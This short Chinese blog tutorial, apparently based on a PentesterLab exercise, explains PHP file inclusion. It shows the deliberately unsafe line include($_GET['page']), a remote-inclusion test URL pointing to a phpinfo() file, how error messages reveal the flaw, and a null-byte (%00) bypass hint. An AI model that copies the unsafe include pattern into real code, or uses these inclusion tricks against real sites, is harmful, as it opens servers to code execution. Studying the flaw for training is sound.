// 让用户来决定你包含的文件,那就存在文件包含漏洞
if($_GET['page']) include($_GET['page']);
// 比如:http://vulnerable/fileincl/example1.php?page=https://pentesterlab.com/test_include.txt
// test_include.txt 的内容是:
<?php
phpinfo();
?>
发现是否存在文件包含漏洞的技巧, http://vulnerable/fileincl/example1.php?page=
notexist.php, 报错:
Warning: include(notexist.php): failed to open stream: No such file or directory in /var/www/fileincl/example1.php on line 7 Warning: include(): Failed opening 'notexist.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/fileincl/example1.php on line 7
此外,还可以进一步尝试在
test_include.txt的末尾添加
% 00(没有空格)来尝试
没有评论:
发表评论